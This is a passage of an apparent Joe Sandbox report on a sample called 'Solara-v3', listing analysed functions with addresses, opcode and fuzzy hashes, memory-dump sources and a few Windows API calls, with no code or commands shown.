                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7d25e4151b20e1252b310cbf19ae9d376f513415a955b05fc74d62dd8d03d4cb
                                                                                                                                                                                                                                              • Instruction ID: 4b10f2fb83d240a8194653326424cd87360353ae92ccfbb6a9d51511832f3619
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d25e4151b20e1252b310cbf19ae9d376f513415a955b05fc74d62dd8d03d4cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E312635611700CFD7258F35C890652B7A3FF8A318B28D1AEC5968BBA6D73AE403C709
                                                                                                                                                                                                                                              Function 00429A43 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d951a064ba376ef0ab1e331f3da37d4909f203b053ee85f0241cb0e20adf5693
                                                                                                                                                                                                                                              • Instruction ID: 483fac9db8fa4d4ce9a32f7b6d2a99bd651ee9dedbbfcbc43d88c98b5340b176
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d951a064ba376ef0ab1e331f3da37d4909f203b053ee85f0241cb0e20adf5693
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A319175918325DFE7108F24E84076BB3E0FF8A704F42992DFA8867251D775AD02DB8A
                                                                                                                                                                                                                                              Function 004291B1 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 5e25419dcdc4a6fc980d0c6fae64b8a2c5d6b13afd9a4bbe918282eb8fec4a2f
                                                                                                                                                                                                                                              • Instruction ID: d8e08574f82cd8de6d4a912b3747ff5c6ffa62e7e0667d109b6447ea9b859a78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e25419dcdc4a6fc980d0c6fae64b8a2c5d6b13afd9a4bbe918282eb8fec4a2f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69112631708131AFE7218B58E840B3B73A6EB56700F86547EE8459B262C735DC51C79E
                                                                                                                                                                                                                                              Function 00415F4C Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: c8c0b179c961012aaf13dcfc384b3cf47c4208e7f499cb5a1f75f21b03d5c3ad
                                                                                                                                                                                                                                              • Instruction ID: e01e8ad496858cf7e03153b796b9d7568f72ed25b099349c96fe9f05fa2df913
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8c0b179c961012aaf13dcfc384b3cf47c4208e7f499cb5a1f75f21b03d5c3ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8521EE396083009BE324CF28D8807ABB7E6BFCC310F55542EE4C9D3390CA75A882C749
                                                                                                                                                                                                                                              Function 00429266 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2ec7078835481f123f5f77f44bdbf82c19f6412a785f005351cfc70050280c9f
                                                                                                                                                                                                                                              • Instruction ID: de574d8ef507392a8877d5164bd103d2c8184940448fadef50134c9f0e47bf87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ec7078835481f123f5f77f44bdbf82c19f6412a785f005351cfc70050280c9f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC219D32A182309BD724CB64D41033BB3A2BB99B00F43952EEC89A7390C3359C51C7DA
                                                                                                                                                                                                                                              Function 00415E8C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: f786f9d0427de763eb256307a40778ccb2397783a6807c68432138b4c80bfda7
                                                                                                                                                                                                                                              • Instruction ID: e9f2c898b879e903da70b9e429ce9134d7ef22d2719c10893a826b5f0a97e484
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f786f9d0427de763eb256307a40778ccb2397783a6807c68432138b4c80bfda7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6118C35A14B108BD728CF14C8803FBB2D7ABC5310F9A143DA9C9A7390DA755C81C34C
                                                                                                                                                                                                                                              Function 0042D5E6 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 865dbfc94376fd9eda7bada6642632c65b23654f0560e6e8f497fc09db05edbb
                                                                                                                                                                                                                                              • Instruction ID: ac6ca9c93964504772eca284631e760098c7aed601eafe4151e82a679ad36206
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 865dbfc94376fd9eda7bada6642632c65b23654f0560e6e8f497fc09db05edbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D21DA7AA2522047DB6CCF39D8A96BAE292EB81300F59E63DD446E73A0FF7485008745
                                                                                                                                                                                                                                              Function 00434E60 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                              • Instruction ID: 1294d0705928bf3a89d236d6dca5d2cbcf07529827a8e07e7f8c1353ee7f14bb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F112933A081D04EC312CD3C84005E5BFE31AD7235F5D939AF4B49B2D2D6279D8A8359
                                                                                                                                                                                                                                              Function 00429F80 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                              • Instruction ID: 751a0443e18ccd328d4b1c2847a2144c861d21d079d442caefe011fc4f84fbda
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97718bc0ed5acd2ef67b6ac929bf9cde3530f8ae51658a77dfe51b2ee5937b12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C101B5F1B0031257E7609E11B5C0B27B2A86F84718F49453EE84897745EB7DFC05C29A
                                                                                                                                                                                                                                              Function 0043B8A0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 1078bce38a58236b1dcac59600fd09b41bbb1c8398a618abe0f8d5b15d6c0b66
                                                                                                                                                                                                                                              • Instruction ID: 8a02cb41ffff968b99fb010e73d9931b32f54ff3ec56746a22d9f2732814edb2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1078bce38a58236b1dcac59600fd09b41bbb1c8398a618abe0f8d5b15d6c0b66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7911C275008308AFC610AB15D884A7BB7AAFFDE319F05142DE78457330E332AD60DB96
                                                                                                                                                                                                                                              Function 0040A2A6 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                                              • Instruction ID: 77776f84d681761c0ea4071f8d21c85d41b3b70496975be68b61ff512d909adb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C110B31A543418FD7388F658410276B7E5AF9271572DC93EC8D3A7345DB3898528F49
                                                                                                                                                                                                                                              Function 0043CDF0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                                              • Instruction ID: 04682a1340c881939bba4ac63b5721f1f095575c768f5dd830452c6098d82978
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3101D636D15A604BD319CF38CC1039673E6AB86306F098538DA45E7798DB7A98508784
                                                                                                                                                                                                                                              Function 0040A533 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                                              • Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684
                                                                                                                                                                                                                                              Function 0042349F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 149COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423561
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042365E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: afrf$dfkf$s6B$tfff
                                                                                                                                                                                                                                              • API String ID: 237503144-2388771387
                                                                                                                                                                                                                                              • Opcode ID: 739c69699291754c9f9d4d5da237538ed2a12a9be9dcb9908bf42b9da2381962
                                                                                                                                                                                                                                              • Instruction ID: c4fcef847fc9925244f9592ad32bc230489d7192a80fca4986f29a4843e4299b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 739c69699291754c9f9d4d5da237538ed2a12a9be9dcb9908bf42b9da2381962
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA51ACB1D002149FDB14CF9ADC82B9A7AB4FB84310F15816DE904AF399C7798942CBE6
                                                                                                                                                                                                                                              Function 004284C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428577
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                              • String ID: B]C]$B]V]$S%1e$S%1e
                                                                                                                                                                                                                                              • API String ID: 237503144-91396555
                                                                                                                                                                                                                                              • Opcode ID: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                              • Instruction ID: 8746a14ed2116129ecf6ab586aa45845e2b2ebc96e851e8bdc8583723b65a5bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED21057260C3255FE328CF25D8557ABF2E7EFC5700F11C83D95899B2D1DAB08446879A
                                                                                                                                                                                                                                              Function 00432AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000004.00000002.3286876234.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                              • Opcode ID: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                              • Instruction ID: d2e9c7bdcd16e3a15224797572231dfe0fa3dd802bd302cf10fb2ba368259f32
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7e015fa189f20fae8a1e1574193bbbed12d41f97909a9eee6515be2d05f634e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 723192B49143148FDB00EF68DA85649BBF4BF89304F41852EE898DB360D3B4A958CF86